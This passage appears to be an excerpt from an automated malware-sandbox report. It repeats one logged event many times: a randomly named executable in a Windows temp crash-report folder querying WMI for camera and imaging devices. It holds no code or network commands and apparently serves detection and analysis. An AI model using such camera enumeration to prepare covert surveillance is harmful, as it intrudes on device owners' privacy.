                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
